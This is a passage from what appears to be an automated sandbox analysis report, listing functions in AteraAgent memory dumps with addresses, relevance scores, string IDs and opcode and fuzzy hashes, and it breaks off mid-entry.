                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8bf278b8c223f21608631848dce44dd5b6b6d12a349e90c5a45fa5a9860b6f03
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E613B31A0E6894FD796DFA4C8607D57BF1EF56340F1601EAD048D72A2CA399E86CB11
                                                                                                                                                                                                                                                                                                Function 00007FFD9B593765 Relevance: 3.5, Strings: 2, Instructions: 1036COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: f:_H$x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2263521172
                                                                                                                                                                                                                                                                                                • Opcode ID: 54176ba258c725f54f95d572ae3fbc76ce7bf882b949e9dbbefd0def18113548
                                                                                                                                                                                                                                                                                                • Instruction ID: e1f4c3813efa102983ecffb9ecabf86c1de03caadf14d2ca505e1f4ec2166b35
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54176ba258c725f54f95d572ae3fbc76ce7bf882b949e9dbbefd0def18113548
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B462F131B1DF8A8FEBA9DB688060A6577E1FF98340F5500B9E44DC32A7DE24ED418781
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38DE20 Relevance: 3.0, Strings: 2, Instructions: 550COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: H$P9uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1360186544
                                                                                                                                                                                                                                                                                                • Opcode ID: 26302a9e9496c1cf307cb4afb46e6d71cc56afd487677b037c6b98a5f05b6fdf
                                                                                                                                                                                                                                                                                                • Instruction ID: 0a56b5cd6661865fec7ef60923fb29f38bdda93ec0c63fda97d7f07e95c96e67
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26302a9e9496c1cf307cb4afb46e6d71cc56afd487677b037c6b98a5f05b6fdf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CE14671B1DE490FE7A9EB6C846557977E1EFA9300B0501BEE08DC72A7DE34AC428342
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38CCC0 Relevance: 2.8, Strings: 2, Instructions: 328COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: huR$puR
                                                                                                                                                                                                                                                                                                • API String ID: 0-3190285665
                                                                                                                                                                                                                                                                                                • Opcode ID: d9df5469386cd9449261d6ce5f0df36ec0038b7b76f7b5443202845b6f763ec2
                                                                                                                                                                                                                                                                                                • Instruction ID: 7a80a33956bbbfb7cd972d0516028fa548920f1a861da0f8b7b16a4e10305801
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9df5469386cd9449261d6ce5f0df36ec0038b7b76f7b5443202845b6f763ec2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FB19361F19A4D4BEBA8EB9898657ECB7E1FFA4310F4001BDD01DD32D6ED7868418742
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38D469 Relevance: 2.8, Strings: 2, Instructions: 289COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: huR$puR
                                                                                                                                                                                                                                                                                                • API String ID: 0-3190285665
                                                                                                                                                                                                                                                                                                • Opcode ID: c21adc0e3b0b6ae9af70d3772b0636a172f03b73b49c10bbd8011ca8083690bf
                                                                                                                                                                                                                                                                                                • Instruction ID: f77ec0cef6ee36d8dbdfc3c4f79eb2ee8f40e66d686ba606f8f01604ece8f5ef
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c21adc0e3b0b6ae9af70d3772b0636a172f03b73b49c10bbd8011ca8083690bf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F918371F19A4D4FEB98EBA888657ECB7E1FF64310F5001B9D01CD72D6EE2869418742
                                                                                                                                                                                                                                                                                                Function 00007FFD9B59A3A0 Relevance: 2.8, Strings: 2, Instructions: 286COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: wR$ wR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2757616843
                                                                                                                                                                                                                                                                                                • Opcode ID: 9bf0b3ff1382fd8ea9251d4ce5615e18275d6ec520167b93990295fb198681d2
                                                                                                                                                                                                                                                                                                • Instruction ID: 1346f6ae348840950f4a26d186478b5af36083dfd413114133cdfc36f588098f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9bf0b3ff1382fd8ea9251d4ce5615e18275d6ec520167b93990295fb198681d2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7916B71B0DA4E4FFBF5EB28846467673E1EF94340F910179D44DC32A7DE24A9428791
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38D76E Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: puR$puR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1344508118
                                                                                                                                                                                                                                                                                                • Opcode ID: f14839c2d665641953eba3284547b520b9bc1e6009bb1c3e22763fec61eb7761
                                                                                                                                                                                                                                                                                                • Instruction ID: b85df679e517a3495b001010bbea6a7b7d7fa4c6c1efc92261d1b6e1802d8c02
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f14839c2d665641953eba3284547b520b9bc1e6009bb1c3e22763fec61eb7761
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F517B72F0EE4D0FE7A9EAAC98656B877A1EF45350F0201BED009C71E6DD396D428342
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38CDF3 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: vM_^$x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1496362218
                                                                                                                                                                                                                                                                                                • Opcode ID: 55b8eb45d47fb83a3ff172b06c359753f1373575cde3481bbc2d1b65e8433cb7
                                                                                                                                                                                                                                                                                                • Instruction ID: 47ebfafdef3d2df893d553eb25f627a6132bbc1beb9c2d0ede5291f5db81e8f5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55b8eb45d47fb83a3ff172b06c359753f1373575cde3481bbc2d1b65e8433cb7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E412B31B0DD4D4FE769EAAC98665B877E1EF99711B0501BFE049C72A2DE206D028781
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3881AE Relevance: 2.6, Strings: 2, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: `[uR$`[uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-4120063511
                                                                                                                                                                                                                                                                                                • Opcode ID: 6955009cf38352b4748c98b64e95537768c51bdbdd2ffea443c845d26bd9df27
                                                                                                                                                                                                                                                                                                • Instruction ID: f93e2d8587d4588df241a434e0f24db2c16988f473c89d8be479f73350df4d5a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6955009cf38352b4748c98b64e95537768c51bdbdd2ffea443c845d26bd9df27
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D414D70E08A1D8FDB98EFA4C8A5BB9B7B1EF54340F5000AED40DD72E2DA345A85CB11
                                                                                                                                                                                                                                                                                                Function 00007FFD9B385201 Relevance: 2.6, Strings: 2, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: `\uR$7uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1646968855
                                                                                                                                                                                                                                                                                                • Opcode ID: a5bb45fc69c3fdd99a059e3d07d4b570a2671d99fd9de3f6109bc56bd19dbd1c
                                                                                                                                                                                                                                                                                                • Instruction ID: 8de98dc739805a8b344fa419eb544a0d9439a2ca38ba5003f95b72f90b7861bd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5bb45fc69c3fdd99a059e3d07d4b570a2671d99fd9de3f6109bc56bd19dbd1c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94218171D09A5D8FDB94EFA8C8A56EDBBF0FF69300F05016AD408E7295CB34A941CB81
                                                                                                                                                                                                                                                                                                Function 00007FFD9B385220 Relevance: 2.6, Strings: 2, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: `\uR$7uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1646968855
                                                                                                                                                                                                                                                                                                • Opcode ID: 5acc1e333085a1436c56a583d623cfc8fcda2ba21c685763ab6bbd015d74508f
                                                                                                                                                                                                                                                                                                • Instruction ID: 02a3d1c2edbd33301455be3eaeb460f320fa2417d6489f7c0832fe68d3b759f9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5acc1e333085a1436c56a583d623cfc8fcda2ba21c685763ab6bbd015d74508f
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A214F71E08A5D8FDB94EF98C855AEDBBF1FF69300F05056AE409E3295CA31A941CB81
                                                                                                                                                                                                                                                                                                Function 00007FFD9B393B18 Relevance: 1.7, Strings: 1, Instructions: 431COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                                                • Opcode ID: 1afa99615adf55c501a8deaa274934a50e702481a1a04afc770ae3c3e1b3544a
                                                                                                                                                                                                                                                                                                • Instruction ID: 546a0c5e36b4458ad09e4fb3a633480a833a6cdbc67306ae99f73e07e860a9f7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1afa99615adf55c501a8deaa274934a50e702481a1a04afc770ae3c3e1b3544a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2D12270B1DB498FE338EB5C94915B5B3E0FF95314B1446BED09AC32A6DA35F8428B81
                                                                                                                                                                                                                                                                                                Function 00007FFD9B39447A Relevance: 1.7, Strings: 1, Instructions: 407COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                                                • Opcode ID: f7b26b9006380cb711332d1d6b7b51bf23f040bb1b88f46d3bd3d7938024ddc9
                                                                                                                                                                                                                                                                                                • Instruction ID: a2cf0bf0e4c12e16a1e3d7617d172c2689f694c708d99610782c17f308023634
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f7b26b9006380cb711332d1d6b7b51bf23f040bb1b88f46d3bd3d7938024ddc9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46C12230B1DB898FE779EB588860635B7E1FF95300B1505BED09AC32A6DE35F9428781
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38F9C4 Relevance: 1.7, Strings: 1, Instructions: 406COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 'X_H
                                                                                                                                                                                                                                                                                                • API String ID: 0-992657322
                                                                                                                                                                                                                                                                                                • Opcode ID: b496c9a2df944a7a139f74b6fd5de76c72f988b701fb827e89f8e772002cc474
                                                                                                                                                                                                                                                                                                • Instruction ID: f08debb91f7c8f4a7579613e44238d711a7d5446e7c49043caff107854a36f8a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b496c9a2df944a7a139f74b6fd5de76c72f988b701fb827e89f8e772002cc474
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDE13271E1595D4FEBA8EB58D8A97E8B3E1FF58301F0001FA941DD3296DE346E818B41
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3907C5 Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                                                • Opcode ID: f3c85a0336dc09e14c7a5ccaf4b8d9c97e6f7a10055dcdd55339e680a45522c5
                                                                                                                                                                                                                                                                                                • Instruction ID: 1f5b0ef168bfa928a2d316b9157b872daeb586e50c787aa1b945d67da7a9904d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3c85a0336dc09e14c7a5ccaf4b8d9c97e6f7a10055dcdd55339e680a45522c5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FAB1FF3071CB4A8FE768EB58D4A1575B3E1FF98710B144A7DD09AC36A6CA35F8438B81
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3886DA Relevance: 1.6, Strings: 1, Instructions: 344COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2013557542
                                                                                                                                                                                                                                                                                                • Opcode ID: 22056369cdef74588baf290e74f8e758c4b4a9f216800f289c757cc7ebeccf7b
                                                                                                                                                                                                                                                                                                • Instruction ID: 37d1f714675da16fff70e9291ea07b1c59e96bb0c656c09c97b8b14e0fae2f84
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 22056369cdef74588baf290e74f8e758c4b4a9f216800f289c757cc7ebeccf7b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B8B10631E0AA5D4FE7A4EBA488647E877F1EF55310F0502BED04DD71E2DA386A46CB41
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38BDE7 Relevance: 1.6, Strings: 1, Instructions: 328COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 0uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1082554596
                                                                                                                                                                                                                                                                                                • Opcode ID: 0dd52247b1ce6e5c7ce1fe19163649ddc882cec45ce09c674d7d26fb8b442f31
                                                                                                                                                                                                                                                                                                • Instruction ID: 7bc601346105cd20954e5ee65d363ec442777a1dc6248b063872360c45a19c7a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0dd52247b1ce6e5c7ce1fe19163649ddc882cec45ce09c674d7d26fb8b442f31
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA910911A0FFCA0FE766D7B848745647FB1EF5624070A41EFC089CB1E7ED29680A8302
                                                                                                                                                                                                                                                                                                Function 00007FFD9B393BF8 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 0uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1082554596
                                                                                                                                                                                                                                                                                                • Opcode ID: d8589ad0b3fe5bc270e2b1a402d7feab141a3ab30a0923120e57596d1185dd24
                                                                                                                                                                                                                                                                                                • Instruction ID: 26a0a83987c0afeeea7d7138cdb6f7add3f1f29407e4f0c1211df60bc91bf490
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d8589ad0b3fe5bc270e2b1a402d7feab141a3ab30a0923120e57596d1185dd24
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCA10F3171DB098FEB68EB6CC4A0A7173E1EF59310B1605BDD08AC76A6D935F882C780
                                                                                                                                                                                                                                                                                                Function 00007FFD9B383FCD Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: x6uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2013557542
                                                                                                                                                                                                                                                                                                • Opcode ID: 967f2c233ed64e4064e286b725be3eff3b288a58f18e0c0584b55ff6a95223bb
                                                                                                                                                                                                                                                                                                • Instruction ID: 8e220c24bd3e3d9963ad2d547fea5937aa5d0f66eacf5182186e8f4f97fc8391
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 967f2c233ed64e4064e286b725be3eff3b288a58f18e0c0584b55ff6a95223bb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EA12771E0EA4D4FE765EBE488616F8BBA0EF51310F45027ED04CDB5E2DA386A46CB41
                                                                                                                                                                                                                                                                                                Function 00007FFD9B393C20 Relevance: 1.5, Strings: 1, Instructions: 296COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: @uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1269069093
                                                                                                                                                                                                                                                                                                • Opcode ID: 234db6a8adf316c01c53136b24cc9d0ceb1945faebeb82528ecc44207c3d7110
                                                                                                                                                                                                                                                                                                • Instruction ID: 8291d42c6cba8f0508ad0f287e49128a5f30b3db361a9ff47bfb012febd79e3d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 234db6a8adf316c01c53136b24cc9d0ceb1945faebeb82528ecc44207c3d7110
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B91453071DB898FE778EF6884A45A677E0EF55310F14067ED48AC32A2EE34F8428781
                                                                                                                                                                                                                                                                                                Function 00007FFD9B5A16A0 Relevance: 1.5, Strings: 1, Instructions: 279COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: X"wR
                                                                                                                                                                                                                                                                                                • API String ID: 0-4046435638
                                                                                                                                                                                                                                                                                                • Opcode ID: 25c7793922549f9ddf66c3d5e848c10958a4ba546d5a003484e2a62447d73376
                                                                                                                                                                                                                                                                                                • Instruction ID: c5c3b813de06e3b9505feda751d14b250cd8bf98d478b0a696f2e53ea7c45af2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25c7793922549f9ddf66c3d5e848c10958a4ba546d5a003484e2a62447d73376
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12815531B0DA494FE7B8EA589461679B3D1EF99710F05017EE08DC32E2DE24E942C782
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38C6E0 Relevance: 1.5, Strings: 1, Instructions: 253COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
